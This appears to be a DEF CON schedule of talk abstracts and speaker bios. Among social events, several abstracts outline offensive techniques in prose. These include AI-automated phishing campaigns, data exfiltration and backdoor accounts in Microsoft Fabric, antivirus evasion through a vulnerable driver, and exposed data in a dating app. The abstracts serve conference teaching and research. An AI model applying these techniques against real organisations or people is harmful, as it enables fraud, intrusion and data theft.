Whether you're in a long-term recovery program or just looking for ways to reduce your intake of alcohol or other substances, one of the first big steps is overcoming the fear of just TALKING about it. Silence feeds stigma, and stigma is stupid... so let's talk about it! This will be a group discussion where we can chat about all forms of recovery and all pathways to leading a healthier lifestyle. Jen will share a little about her personal journey and some of the principles that have helped her to maintain 24 beautiful years of sobriety. It isn't always easy, but it's always worth it. Come make some friends who are on a similar path and share any resources that have helped you in your recovery.
SpeakerBio: Jennifer VanAntwerp, Founder at Sober in CyberJen VanAntwerp is the founder of Sober in Cyber, a nonprofit on a mission to provide alcohol-free events and community-building opportunities for sober individuals working in cybersecurity. She is passionate about breaking the stigma of addiction recovery and is profoundly driven to increase the number of professional networking events that don’t revolve around alcohol. Jen is also the ABM manager at StrongDM, the Zero Trust privileged access platform. When she’s not developing marketing strategies or running her nonprofit, Jen enjoys volunteering, sewing, and tinkering with her beloved ’65 Ranchero.
- ics Calendar file
Make a moment for yourself with this calming and reflective activity. Design your own affirmation card using colorful pens, washi tape, and prompts like “Dear Future Me” or “You're doing enough.” Whether it’s a reminder you need or a message of encouragement, your card is yours to keep. Tuck it in your badge, your bag, or your notebook as a little boost throughout the con.
- ics Calendar file
As a London-based security researcher with a strong focus on open-source intelligence (OSINT) and attack surface discovery, I am excited to attend the DEF CON conference for the first time and contribute meaningfully to the Red Team Village. My passion lies in developing and refining reconnaissance techniques that enable both offensive and defensive practitioners to gain deeper insights into an organization’s digital footprint.
During the RTV Tactics sessions, I will present a DNS-based OSINT methodology for uncovering products and services through large-scale DNS TXT record scanning. This previously unpublished approach demonstrates how certain TXT records can reveal not just domain ownership or validation details, but also the presence of specific third-party services and platforms in use. For instance, TXT entries like google-site-verification, MS=msXXXXXXXX, or vendor-specific SPF includes can expose dependencies on Google Workspace, Microsoft 365, or other cloud-based services.
By programmatically analyzing these records across large swaths of DNS zones, attackers can construct detailed maps of an organization's technology stack and supply chain affiliations—critical intelligence for targeted campaigns. This intelligence also provides defenders with an opportunity to detect inadvertent information leakage and improve control over external DNS configurations.
To support operational use, I have integrated this scanning technique into widely adopted open-source tools such as Nuclei and Amass. These enhancements allow red teams and security researchers to efficiently incorporate TXT record reconnaissance into broader discovery workflows, elevating the precision and depth of traditional enumeration phases.
This session will equip attendees with practical, reproducible tactics for passive and semi-active discovery that can uncover non-obvious attack vectors. Attendees will leave with actionable insights and tooling that can be immediately applied to real-world engagements.
It would be an absolute honor to support the Red Team Village and give back to a community that has been instrumental in shaping my growth as a researcher. I deeply value the Village’s mission to educate, inspire, and empower red teamers of all experience levels, and I am eager to contribute to that mission by sharing knowledge that enhances our collective offensive capabilities and understanding of adversarial tradecraft. Thank you for the opportunity to be considered.
SpeakerBio: Rishi "rxerium" ChudasamaRishi Chudasama is a London-based security researcher with over five years of hands-on experience in IT. He currently specializes in vulnerability research, threat intelligence, and enterprise risk analysis. His current focus lies in identifying and analyzing zero-day vulnerabilities and emerging CVEs, often working to reverse engineer exploit mechanics and build detection logic before public weaponization. Rishi’s work spans both offensive and defensive domains—developing threat models based on real-world TTPs, crafting custom detection rules, and automating reconnaissance pipelines to uncover exploitable misconfigurations and exposed assets. He is particularly active in attack surface management (ASM) and OSINT, where he leverages DNS enumeration, passive data correlation, and large-scale infrastructure scanning to surface unknown entry points and map adversary-accessible exposure. Outside of research, Rishi integrates findings into operational tooling and supports data-driven prioritization strategies to bridge technical risk and business impact. His work reflects a deep commitment to adversary-informed defense and proactive discovery across modern hybrid environments.
- ics Calendar file
Effective phishing campaigns traditionally demand extensive manual effort, involving detailed target reconnaissance, crafting believable scenarios, and setting up infrastructure. These manual processes significantly restrict scalability and customization. This talk explores a practical approach to leveraging Generative AI for automating core aspects of phishing workflows, drawing on direct experiences and real-world threat actors such as Emerald Sleet, Crimson Sandstorm, and Charcoal Typhoon.
The session thoroughly compares results from different models and platforms, including OpenAI ChatGPT, Anthropic Claude, and local alternatives, highlighting distinct strengths, weaknesses, and techniques for optimizing outcomes. Attendees will gain insights into deploying an end-to-end phishing campaign, emphasizing the models' effectiveness in reducing the technical barrier of scaling phishing attacks. Finally, the talk underscores that while AI significantly enhances operational efficiency, it functions best when complemented by human judgment and expertise, reinforcing the critical human factor in cybersecurity practices.
SpeakerBio: Daniel Marques, Red Team Senior ManagerAs an experienced Red Team leader, Daniel applies a strong software development and networking background to help Fortune 500 companies identify and remediate vulnerabilities in various technologies, including corporate networks, applications, and smart devices. With more than 15 years of experience in Cybersecurity, prominent local and international security conferences such as HOU.SEC.CON, ISC2 Security Congress, and Black Hat Regional Summit featured his Offensive Security research. Daniel holds a B.Sc. in Computer Science and an M.Sc. in Cybersecurity. In 2019, Daniel was part of the team that won the DEF CON Biohacking Village Capture the Flag competition.
--
With over 15 years in offensive security, Daniel applies a strong software development and networking background to help Fortune 500 companies identify and remediate vulnerabilities in various technologies, including corporate networks, applications, and smart devices. With more than 15 years of experience in Cybersecurity, prominent local and international security conferences such as HOU.SEC.CON, ISC2 Security Congress, and Black Hat Regional Summit featured his Offensive Security research. Daniel holds a B.Sc. in Computer Science and an M.Sc. in Cybersecurity. In 2019, Daniel was part of the team that won the DEF CON Biohacking Village Capture the Flag competition.
- ics Calendar file
- ics Calendar file
Ever had questions about how to report a vulnerability to Amazon or AWS, and what actually happens after you click “submit”? You’re not alone. With cloud services powering so much of what we use every day, making it easy and collaborative to report security issues helps strengthen the whole ecosystem.
In this session, members of the Amazon and AWS Vulnerability Disclosure Program (VDP) and Amazon Vulnerability Research Program (VRP) teams will offer a behind-the-scenes look at how these programs operate, the types of issues in scope, and a new initiative aimed at deepening collaboration with the security research community.
We’ll cover what makes a strong vulnerability report, how to submit it through the appropriate channels, and what to expect throughout the process, from triage to resolution. Attendees will also gain insight into how Coordinated Vulnerability Disclosure (CVD) is approached, along with how public disclosure decisions are made in collaboration with researchers.
Whether you’re an experienced researcher or just starting out, this talk will give you practical knowledge and a clearer understanding of how to engage with Amazon and AWS, and how we’re working to make that experience even better
--
AWS security experts Ryan, Albin Vattakattu, Wesley, and Justin bring together decades of combined experience across threat hunting, incident response, bug bounty management, and security research. This dynamic team includes Ryan, an AWS Senior Security Engineer and co-author of AWS Detective, Albin, a technical lead for AWS’s Vulnerability Disclosure Program (VDP) team, while Wesley and Justin serve on Amazon’s Bug Bounty Team managing vulnerability reports and researcher relations. Joining them as a guest speaker is Kasimir Schulz, Director of Security Research at HiddenLayer and active AWS VDP researcher, whose pioneering work in AI security has been featured in major tech publications and conferences like Black Hat. Together, they represent expertise spanning threat research, vulnerability management, offensive security, and the development of cutting-edge security tools and automation.
Speakers:Ryan Nolette,Albin Vattakattu,Kasimir Schulz,Justin,Wesley
- ics Calendar file
Systems engineers may need different toolchains, whether its a specific configuration for a unique target or something so they can cross compile. On many distros, this requires either manually building the toolchain or finding the right packages. With Nix, we can do it declaratively.
I will be going into the new toolchain attributes mechanism in nixpkgs and how my work on the Standard Environment team opens the door to many new things for embedded and systems engineering with nix.
SpeakerBio: The Computer GuyLow level programmer, OS/Zig/Linux dev, Nixpkgs committer (LLVM). Likes to watch 大空スバル (Subaru Oozora).
- ics Calendar file
Drew Springall is an Assistant Professor of Computer Science at Auburn University, and is a hacker/security researcher with a focus on the technical/concrete aspects of voting system security. Since 2013, Drew has worked to understand and demonstrate the difficulty attackers would face should they attempt to attack such systems as deployed in the real-world and given realistic resources to leverage. Most recently, Drew has worked specifically on the DVSorder ballot randomization flaw and the ”Security Analysis of Georgia’s ImageCast X Ballot Marking Devices” report published along with Prof. J. Alex Halderman.
SpeakerBio: Philip Davis
- ics Calendar file
Using the Dominion touchscreen BMD debuted at Voting Village 2023, we will discuss and demonstrate in real-time how technically simple "hacks" to the ballot displayed on the voter’s touchscreen can directly impact the vote count, or alternatively impact the voter’s decisions. These simple “hacks” to the election definition (with no need to inject malware) include the manipulation of display of candidate choices, silent removal of candidates from the display, and using false instructions on the touchscreen to intentionally misinform voters regarding candidates or ballot questions. Furthermore, attempting to determine/recover from such hacks on the election outcomes can range from difficult to impossible. In addition to discussing the tactics and potential impacts, we will illuminate underlying system design decisions which enabled such hacks to be technically simple, feasible, and easily executable. The knowledge and tools used/discussed were obtained through public means and public websites, available to an unlimited number of people. This talk will focus on the general methodology and ease of the vote manipulation, the range of impacts, the feasibility and scalability. Immediately following the on-stage presentation, a deeper dive into the technical aspects will occur in the adjacent Voting Village lab room.
Speakers:Drew Springall,Philip Davis,Marilyn MarksDrew Springall is an Assistant Professor of Computer Science at Auburn University, and is a hacker/security researcher with a focus on the technical/concrete aspects of voting system security. Since 2013, Drew has worked to understand and demonstrate the difficulty attackers would face should they attempt to attack such systems as deployed in the real-world and given realistic resources to leverage. Most recently, Drew has worked specifically on the DVSorder ballot randomization flaw and the ”Security Analysis of Georgia’s ImageCast X Ballot Marking Devices” report published along with Prof. J. Alex Halderman.
SpeakerBio: Philip Davis
- ics Calendar file
This workshop will provide participants with the necessary knowledge to plan and execute red team exercises that accurately emulate real-world threat actors. Using MITRE ATT&CK as a foundation, attendees will learn how to map adversary tactics, techniques, and procedures (TTPs) to red team operations, ensuring realism down to the indicator of compromise (IOC) level. The workshop culminates with the hands-on development of a red team campaign to emulate an advanced persistent threat (APT) group. For this exercise, participants will receive simulated exercise objectives and rules of engagement and will use presented techniques to develop a basic red team campaign plan for successfully emulating the selected threat group.
SpeakerBio: William GilesWilliam (Billy) Giles is an Offensive Security leader and practitioner who specializes in red/purple teaming, adversary emulation, and network penetration testing. With a deep passion for understanding and simulating adversary behaviors, he helps organizations across a multitude of industries assess their security postures, identify and remediate vulnerabilities, and build stronger defenses by thinking like an attacker.
- ics Calendar file
The presentation will be based on a new paper that examines which elements of a post-election audit are necessary to provide publicly available evidence to confirm the outcome of an election is correct. The paper and presentation will take a close look at the post-election audits conducted after the 2024 election in the seven closely contested swing states and will examine if the audits conducted after the November election meet, or don't meet, the criteria for effective, trustworthy, meaningful, and reliable audits.
SpeakerBio: Susan Greenhalgh, Free Speech For PeopleSusan Greenhalgh is the Senior Advisor on Election Security for Free Speech For People. Ms. Greenhalgh has previously served as vice president of programs at Verified Voting and at the National Election Defense Coalition, advocating for secure election protocols, paper ballot voting systems and post-election audits. Recognized as an expert on election security, she has been invited to testify before the U.S. Commission on Civil Rights and has been an invited speaker at meetings of the MITRE Corporation, the National Conference of State Legislatures, the Mid-West Election Officials Conference, the International Association of Government Officials, the Election Verification Network and the E-Vote-ID conference in Bregenz, Austria. She is a frequent source for reporters from TheNew York Times, The Washington Post, The Wall Street Journal, Politico, USAToday, Associated Press, National Public Radio and other leading news outlets. She has appeared on CNN and MSNBC’s The Rachel Maddow Show, and various other television news shows. She has a BA in Chemistry from the University of Vermont.
- ics Calendar file
Have you ever wanted to break out of handcuffs, pick open a closed bag and shoot your buddy in the chest with a nerf gun? So have we, that's why TOOOL presents the Dozer Drill. A fast paced skill based game where you have to free yourself from handcuffs, open a closed bag, and retrieve the nerf gun to be the first to hit the target. Join us on Friday for qualifiers, through the con for unofficial games, and on Saturday for an official bracket tournament.
SpeakerBio: Kataze, TOOOLA skunk with a phys sec fascintation and a little too much time on his hands, Kataze has been helping The Open Organization Of Lockpickers present DEFCON's Lock Pick Village for over five years now!
- ics Calendar file
In this half hour overview, village residents Utvecklas and George explain the basics of how Drain and Approval Attacks work. Judging from attendance at yesterday's workshop of the same name, we get to hear if this particular attack is easy to identify, and how likely we are to be victims. A review of lessons learned in the workshop lead to sneak previews of Georg and Utvecklas' next generation of research and likely outcomes.
Speakers:George,utvecklasGeorge is a cryptocurrency enthusiast who has been actively involved in the space since 2018. With a focus on crypto marketing and security, he has successfully launched multiple projects aimed at improving both user adoption and safety. George is passionate about bridging the gap between complex technologies and mainstream audiences.
SpeakerBio: utvecklasUtvecklas is a computer scientist and privacy advocate who has integrated cryptocurrency into online businesses since 2016. Over time, cryptocurrency itself became his primary interest. Outside of work, his research specializes in exploits — whether past, ongoing, or potential.
- ics Calendar file
En esta charla mostraré los detalles de una investigación reciente del GERT de Kaspersky sobre una vulnerabilidad en un driver que permite a un atacante ejecutar código malicioso para evadir los antivirus de los sistemas. Analizaremos cómo se descubre la vulnerabilidad, la forma en que un atacante la aprovecha para desactivar soluciones de seguridad y cómo logra la evasión completa. Además, presentaremos un análisis técnico del ataque y del incidente, incluyendo el flujo de ejecución y cómo se consigue el bypass de las defensas modernas. Finalmente, discutiremos contramedidas y recomendaciones para protegerse frente a este tipo de ataques.
SpeakerBio: Ashley Hiram Muñoz, Kaspersky - Incident Response SpecialistActualmente me desempeño como Incident Response Specialist en el Global Emergency Response Team (GERT) de Kaspersky, cuento con 6+ años de experiencia realizando tanto forense digital, así como Análisis de Malware y Reversing, y previo a dedicarme a DFIR (Digital Forensics and Incident Response) laboré 2 años como Penetration Tester.x000D He colaborado en distintos proyectos de Threat Intelligence y Threat Hunting.x000D Actualmente soy profesor de los módulos de Análisis Forense y Análisis de Malware en un diplomado de seguridad de la información en México.x000D x000D Certificaciones: GREM, GCFA, eCTHP, CHFI.
- ics Calendar file
Experience the thrill of flying a drone in our custom-built cage right on the showroom floor. This activity is designed for everyone to enjoy, from kids to adults. Fly mini drones around the cage and see how well you can control these agile little machines. It's a fun, interactive way to learn the basics of drone piloting in a safe environment.
- ics Calendar file
Join our Drone Hacking Workshop and get hands-on experience with hacking into drone microcontrollers. This three-step in-depth activity is designed to teach you about the vulnerabilities and security of autonomous systems. Using sample drones, participants will learn techniques used in government pen tests. This workshop is suitable for all skill levels, from beginners to advanced hackers. Come and test your skills in a real-world scenario and understand the intricacies of drone security.
- ics Calendar file
In the continuously evolving world of browser extensions, security remains a big concern. As the demand of feature-rich extensions increases, priority is given to functionality over robustness, which makes way for vulnerabilities that can be exploited by malicious actors. The danger increases even more for organizations handling sensitive data like banking details, PII, confidential org reports, etc. Damn Vulnerable Browser Extension (DVBE) is an open-source vulnerable browser extension, designed to shed light on the importance of writing secure browser extensions and to educate developers and security professionals about the vulnerabilities and misconfigurations that are found in browser extensions, how they are found, and how they impact business. This built-to-be-vulnerable extension can be used to learn, train, and exploit browser extension-related vulnerabilities.
SpeakerBio: Abhinav KhannaAbhinav is an information security professional with 6+ years of experience. Having worked at organisations like S&P Global and NotSoSecure, his area of expertise lies in web appsec, mobile appsec, API security, and browser extension security. He has spoken at multiple conferences like Black Hat Asia, Black Hat Europe, and Black Hat MEA. In his free time, he likes playing table tennis.
- ics Calendar file
Dyna is a full-spectrum Android security auditing framework designed to automate the OWASP MASTG checklist using both static and dynamic analysis. Built for red teams, appsec engineers, and mobile researchers, Dyna combines Frida, Drozer, PyGhidra, and ADB-based techniques into a modular pipeline that evaluates app permissions, exported components, crypto misuse, insecure storage, IPC abuse, native binary risks, and reverse engineering resilience. It can detect traversal, SQLi, hardcoded secrets, and debuggable builds, while reverse engineering .so files using Ghidra in headless mode. Dyna also features real-time logcat parsing and deep link/URL extraction to trace third-party leaks and misconfigurations. With colored output, structured reports, and an extensible architecture, Dyna turns OWASP MASTG from a checklist into a powerful automated testing workflow.
Speakers:Arjun "T3R4_KAAL" Chaudhary,Ayodele IbidapoArjun is a dedicated and certified cybersecurity professional with extensive experience in web security research, vulnerability assessment and penetration testing (VAPT), and bug bounty programs. His background includes leading VAPT initiatives, conducting comprehensive security risk assessments, and providing remediation guidance to improve the security posture of various organizations. With a Master's degree in Cybersecurity and hands-on experience with tools such as Burp Suite, Wireshark, and Nmap, he brings a thorough understanding of application, infrastructure, and cloud security. As a proactive and self-motivated individual, he is committed to staying at the forefront of cybersecurity advancements. He has developed specialized tools for exploiting and mitigating vulnerabilities and collaborated with cross-functional teams to implement effective security controls. His passion for cybersecurity drives him to continuously learn and adapt to emerging threats and technologies. He is enthusiastic about contributing to innovative security solutions and engaging with the broader security community to address complex cyber threats. He believes that the future of cybersecurity lies in our ability to innovate and adapt, and he is dedicated to making a meaningful impact in this field.
SpeakerBio: Ayodele IbidapoAyodele is a cybersecurity consultant and application penetration tester with over 15 years of experience strengthening enterprise security architecture, risk governance, and secure DevSecOps practices across finance, telecom, and manufacturing sectors. His expertise spans mobile, web, and containerized applications, where he developed taint flow analyzers, automated vulnerability discovery workflows, and built custom static and dynamic analysis tools to uncover complex security flaws. He holds a Master’s in Information Systems Security Management from Concordia University of Edmonton and a B.Eng. from the University of Portsmouth. His research on CVSS v2 environmental scoring was presented at IEEE’s international conference at MIT, and he continues to bridge deep technical testing with strategic design to deliver resilient, risk-informed solutions.
- ics Calendar file
In this interactive exercise, you’ll learn how easy it is nowadays to reverse engineer the apps that are used to configure and interact with IoT devices.
IoT hacking with no multimeter or soldering iron required!
- ics Calendar file
- ics Calendar file
EFF's team of technology experts have crafted challenging trivia about the fascinating, obscure, and trivial aspects of digital security, online rights, and Internet culture. Competing teams will plumb the unfathomable depths of their knowledge, but only the champion hive mind will claim the First Place Tech Trivia Badge and EFF swag pack. The second and third place teams will also win great EFF gear.
No prerequisites! Just a desire to have fun and come answer some trivia questions. Participants will need to join a team which they can create beforehand or join one ad-hoc during the event!
None
- ics Calendar file
This is the main event at Embedded Systems Village and was awarded the Black Badge at DEFCON 32. Come and show off your skills at hacking our collection of vulnerable embedded devices and find flags to score points! From the networked embedded devices to hands-on embedded challenges, this CTF will be sure to challenge!
- ics Calendar file
This is the main event at Embedded Systems Village and was awarded the Black Badge at DEFCON 32. Come and show off your skills at hacking our collection of vulnerable embedded devices and find flags to score points! From the networked embedded devices to hands-on embedded challenges, this CTF will be sure to challenge!
- ics Calendar file
Empire 6.0 is the latest evolution of the Command and Control (C2) framework. This major release introduces powerful new capabilities, including Go-based agents for enhanced cross-platform compatibility, a completely overhauled Empire compiler for streamlined payload deployment, and an integrated plugin marketplace in Starkiller. Enhanced module systems, dynamic option handling, Beacon Object File integration, and advanced remote script execution further expand Empire's capabilities. Empire continues to provide cryptographically secure communications and direct integration with the MITRE ATT&CK framework to emulate real-world Advanced Persistent Threat tactics, techniques, and procedures. This demo lab will highlight these significant advancements and demonstrate Empire 6.0's state-of-the-art capabilities.
Speakers:Vincent "Vinnybod" Rose,Jake "Hubble" KrasnovVincent "Vinnybod" Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.
SpeakerBio: Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC SecurityJake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.
- ics Calendar file
Hack your first embedded system! Sit down at our provided laptops and be guided through exploiting an IP camera, then learn how you can set up the emulated camera (and other devices) at home with Ludus!
- ics Calendar file
Enshittification is the malware whose whole mission is to keep you powerless and paying for something that degrades your user experience in the pursuit of unending profit growth. Yes, bills have to be paid, but it's alarmingly prevalent, and propagating at a speed only proportionate to our propensity to spend on stuff doing the enshittifying without consequence. A great man once said ''La piraterie n'est jamais finie'' (piracy is never over) and if there is one place in the world where a solution can be born, it's Defcon. Let's talk.
We will look at many examples, ramifications and propagation methods for the Enshittification malware, and how to establish perimeter defenses to stop it. We'll also cover the activities and examples leading the way in decontaminating the products, services and technologies we like(d).
In the end, (it doesn't even maaatter. see what we d-...) we need each other and our biggest challenge is getting along in the context of fighting enshittification. Let's come together and fix this.
Join Sam B.G., GITC, scsideath and Spike for an awesome panel!
Speakers:Andrew "Spike" Brandt,Samuel Gasparro,Daniel Ward,Neumann "scsideath" LimAndrew Brandt is a former investigative journalist who switched careers to work in information security in 2007. He is an experienced malware analyst, network forensicator, and cyberattack untangler, who seeks to prevent cybercriminals from being able to victimize others. He has served as the director of threat research or as a principal researcher at several large cybersecurity companies, and currently serves on the board of World Cyber Health, the parent organization that operates the Malware Village at Defcon and other conferences. As the executive director of Elect More Hackers, he is active in cybersecurity and technology policy, and seeks to recruit likeminded folks to run for elected office. He lives in Boulder, Colorado.
SpeakerBio: Samuel GasparroNeumann Lim has a strong background in cybersecurity and infrastructure management currently leading the Odlum Brown Team. He also has an extensive IR experience at previous companies such as Deloitte Canada, EY, CGI, and ISA. Currently, Neumann is serving in advisory board roles at SANS, EC-Council and other organizations. Neumann’s expertise includes digital forensics, incident response, modernizing infrastructure, infrastructure resilience, site reliability, malware research, pentesting and leadership in information security policies. Outside of corporate life, Neumann is the co-founder of Malware Village, judge and participant of various cyber CTFs. Neumann is often seen speaking or leading workshops at various conferences such as DEFCON, BlueTeamVillage, GrayhatCon, BSides, Toronto CISO Summit, CCTX, HTCIA, IACIS.
- ics Calendar file
EntraGoat is a deliberately vulnerable environment designed to simulate real-world security misconfigurations and attack scenarios in Microsoft Entra ID (formerly Azure Active Directory). Security professionals, researchers, and red teamers can leverage EntraGoat to gain hands-on experience identifying and exploiting identity and access management vulnerabilities, privilege escalation paths, and other security flaws specific to cloud-based Entra ID environments. EntraGoat is tailored specifically to help security practitioners understand and mitigate the risks associated with cloud identity infrastructures. The project provides a CTF-style learning experience, covering a range of misconfigurations, insecure policies, token abuses, and attack paths commonly exploited in real-world Entra ID breaches. By using EntraGoat, security teams can enhance their skills in Entra ID security, validate detection and response capabilities, and develop effective hardening strategies.
Speakers:Tomer Nahum,Jonathan ElkabasTomer is a security researcher at Semperis, where he works to find new attacks and how to defend against them in on-prem identity stacks such as Active Directory, as well as cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by Microsoft Security Response Center (MSRC).
SpeakerBio: Jonathan ElkabasJonathan is a security researcher at Semperis, specializing in Entra ID and Active Directory security. With expertise in identity-based threats, he focuses on analyzing attack techniques, developing detection strategies, and enhancing defenses against evolving cyber threats. He actively contributes to the security community through research, threat intelligence sharing, and speaking engagements.
- ics Calendar file
Remember that soul-crushing moment when you opened an 8.9 GB of burp suite file? Yeah, fun times. But here’s something even more annoying: reading a random blog post where someone casually mentions a $5,000 bug—an unauthenticated admin panel hidden on some obscure, unpredictable URL of a well known target.x000D x000D I feel you, it’s hard to deal with huge attack surfaces, endless URLs and thousands of subdomains. And it’s even harder to expand your attack surface to find pages that no one ever looked at it before. Don’t get me wrong—I still think AI sucks at pentesting (sue me). It won’t chain exploits, think creatively, or outsmart a well-configured WAF. But here we are. It’s really good at generating path/subdomains, and picking out the most important targets from a massive list. And lastly, AI can be a smart assistant that is specifically configured for the target app’s test. It handles the boring stuff, so you can focus on breaking things.x000D x000D In this talk, we’re not glorifying AI—we’re putting it to work. Smart, sharp, and right where it counts.
SpeakerBio: Özgün KültekinHey! I’m Ozgun (aka ozzy), a 25-year-old security researcher. By day, I’m trying to live as a penetration tester. By night? Well, it’s a mix—sometimes hunting web bugs, sometimes sneaking around in red team ops, and sometimes just trying not to lose all my chips at poker.x000D x000D I’ve spoken at several conferences, including Hacktivity, BsidesPrague, and DEFCON. Lately, I’ve picked up a new hobby—studying LLMs and AI. Not the hype, but the scientific magic side of things. I’ve been exploring how to blend them into cybersecurity in smarter, more effective ways.
- ics Calendar file
Win bug bounty prize by escaping a game sandbox environment
- ics Calendar file
This talk explores the importance of implementing robust access controls in GraphQL and REST APIs and the severe consequences when these controls are not properly enforced. GraphQL, a flexible data query language, allows clients to request exactly the data they need, but without proper access control mechanisms, sensitive data can be easily exposed. Using the Feeld dating app as a case study, we will dive into a critical security review of how the lack of access controls in GraphQL and REST endpoints led to the exposure of users' personal data, including sensitive photos, videos and private messages. This session will highlight common access control vulnerabilities in GraphQL and REST implementations , real-world examples of security lapses, their impact and remediation.
We dive into a critical security review of the Feeld dating app.
Feeld, known for its unique features that cater to a wide range of preferences and relationships, unfortunately had serious security vulnerabilities that exposed users' private data, including sensitive photos and personal information.
Here's what we uncovered:
1- Profile information was accessible to non-premium users.
2- Other people's messages could be read without proper authentication.
3- Photos and videos from chats were exposed unauthenticated.
4- The ability to delete, recover, and edit other people's messages.
5- Profile information could be updated by anyone.
6- Unauthorized likes from any profile.
7- Messages could be sent in other users' chats.
8- Viewing others' matches without permission.
Bogdan Tiron is a seasoned security consultant with over 10 years of experience specializing in application security. He has a proven track record of enhancing security measures for leading organizations, including bet365, JPMorgan Bank, GFK, HSBC, Lloyds Bank, and WorldRemit. Throughout his career, Bogdan has held various roles, including application security consultant, pentester, security architect, and DevSecOps specialist. Four years ago, recognizing a gap in quality within the pentesting industry, he co-founded FORTBRIDGE, a cybersecurity consulting company that offers pentesting, phishing, and red-teaming services to clients seeking to enhance their security posture. Passionate about staying ahead of emerging threats, Bogdan is dedicated to fostering a culture of security within organizations and empowering teams to integrate security practices seamlessly into their workflows.
- ics Calendar file
Big data, big mess. Bigger and more data is in Fabric, the more messy it can be. Azure unified the data lake house, data warehouse and PowerBI services into a SaaS platform called Fabric. In this talk, we discuss the three areas in the tenant level settings to look after and not to open up Fabric to everything. Then we will discuss data exfiltration scenarios (like data pipeline or notebook etc), how is it possible to create backdoor account (i.e.: Activator).
Intro - 1min Who am I and what is Fabric.
Tenant Level Settings to Review - 4mins Selecting the top 3 tenant level areas (External Data Sharing, Admin API calls, Information Protection) to review why they can be dangerous.
Data Exfiltration via Data Pipeline, Notebook, Shortcut, SQL Endpoint, Mirrored Db - 12mins Discussing the possibilities of how data pipeline can automatically copy data from our own tenant's source to a destination in a different tenant. SQL Endpoint is automatically created for reading purposes. Guest account in Entra ID can be added to the workspace as viewer and using SQL Server Management Studio (SSM) to open SQL analytics endpoint. Mirrored Database is automatically synchronize data between 2 database where the destination can be an external tenant. A notebook is all about executing code and handling existing data (handing out the data). Demo video about a pipeline copy to another tenant storage account.
Backdoor via Activator (Notebook, Power Automate, Scheduled Spark Job) - 13mins Discussing how the Activator can be used to create a backdoor user via executing python code via Notebook, Scheduled Spark Job or low-code Power Automate. Demo video (8mins) demonstrating how a backdoor account is created by using Activator to run a Notebook which executes Azure Python SDK code.
SpeakerBio: Viktor GazdagViktor Gazdag has worked as pentester and security consultant for 9 years, lead cloud research working group and M365 capability service. He has reported numerous vulnerabilities in products and plugins from companies such as Oracle, SAP, Atlassian, Jenkins, CloudBees Jenkins, JetBrains, Sonatype. He gave talks about CI/CD and Cloud security at DevOps World, Black Hat USA, DefCon and DoD CyberDT XSWG. He holds multiple AWS/Azure/GCP, Infra as Code, DevOps and Hacking certs and Jenkins Security MVP award.
- ics Calendar file
- ics Calendar file
The attack surface of organizations is constantly evolving, making real-time discovery of exposed technologies and vulnerabilities critical for proactive security. However, conducting searches across multiple Search Engine requires understanding different query syntaxes, which can be time-consuming and inefficient.
SpeakerBio: Abdulla "Abu" AbdullayevAbdulla Abdullayev (Abu) is a cybersecurity leader with over 11 years of experience across finance, government, and startups. He specializes in offensive and defensive security, security architecture, and building high-performing information security teams.
Certified in OSEP, OSWE, OSCP, WCSD, and CEH, Abu is currently a Sr. Security Researcher at Oryxlabs, focusing on security architecture and vulnerability research. He received M.S. degree in Cyber Security from University of Birmingham, UK, in 2016. Abu is a frequent speaker at major security conferences, including Black Hat and CyberWeek, among others.
Experienced in penetration testing, security architecture, security research, offensive&defensive security, incident response, red teaming, identifying zero-day vulnerabilities, and agile methodologies.
- ics Calendar file
Prove your air combat superiority. Only the sharpest contenders will win the limited edition F-35 PCB badge, a symbol of your elite technical skills. Test your wits, and aerospace savvy in this exclusive showdown to earn your wings in the ultimate test of aerospace analytic problem solving. Challenges drop all weekend long.
- ics Calendar file
Queercon is growing up, and everyone with it! Come mingle with other parents and families in the LGBTQIA+ space. Whether you or your children identify with, or are curious about, the community – all are welcome!
- ics Calendar file
Feet Feud (Hacker Family Feud) is a Cybersecurity-themed Family Feud style game arranged by members of the OnlyFeet CTF team and hosted by Toeb3rius (aka Tib3rius). Both survey questions and their answers are crowd-sourced from the Cybersecurity community. Two teams (Left Foot and Right Foot) captained by Ali Diamond and John Hammond and comprised of audience members go head to head, trying to figure out the top answers to the survey questions.
Attendees can either watch the game or volunteer to play on one of the two teams. Audience participation is also encouraged if either of the two teams fails to get every answer of a survey question.
Ultimately Feet Feud is about having a laugh, watching people in the industry attempt to figure out what randomly surveyed people from the Cybersecurity community put as answers to a number of security / tech related questions.
Participants are chosen by team captains from the audience at the start of the show. In order to be fair, we try to select participants from all seating areas, so folks who show up later than others still have a chance to volunteer.
None.
- ics Calendar file
Maritime vessel controls and operational technology (OT) systems are getting more complex and interconnected. With industry trends aiming to reduce crew, automate tasks, and improve efficiency, these networks are expanding in scale, intricacy, and criticality for vessel operation and maintenance. The standard controller area network (CAN) bus for maritime vessel networks, developed by the National Marine Electronics Association (NMEA), known as NMEA2000. NMEA2000 is an application layer network protocol built on the ISO11783 standard and compatible with automotive SAEJ1939, it uses unique message identifiers known as Parameter Group Number, to define the data within each communication frame. Despite its widespread use, NMEA2000 remains a relatively unexplored domain, particularly in understanding normal versus abnormal network behavior, due to the unavailability of open-source datasets. To address this gap, we constructed a NMEA2000 system consisting of five nodes: GPS/Radar, Wind Speed/Direction sensor, and Multifunction Display. Using this setup, we collected datasets to analyze system behavior and developed deterministic fingerprints for each sensor, establishing a baseline of the normal operating system. We subject the system to controlled attacks to evaluate the accuracy and effectiveness of the fingerprints. This work represents a foundational step towards enhancing security and reliability in maritime OT systems.
Speakers:Constantine Macris (TheDini),Anissa EliasConstantine Macris is a Connecticut native and pursuing a PhD at the URI. Constantine is a reserve CDR in the Navy, industry expert in OT and network security and CISO at Dispel.
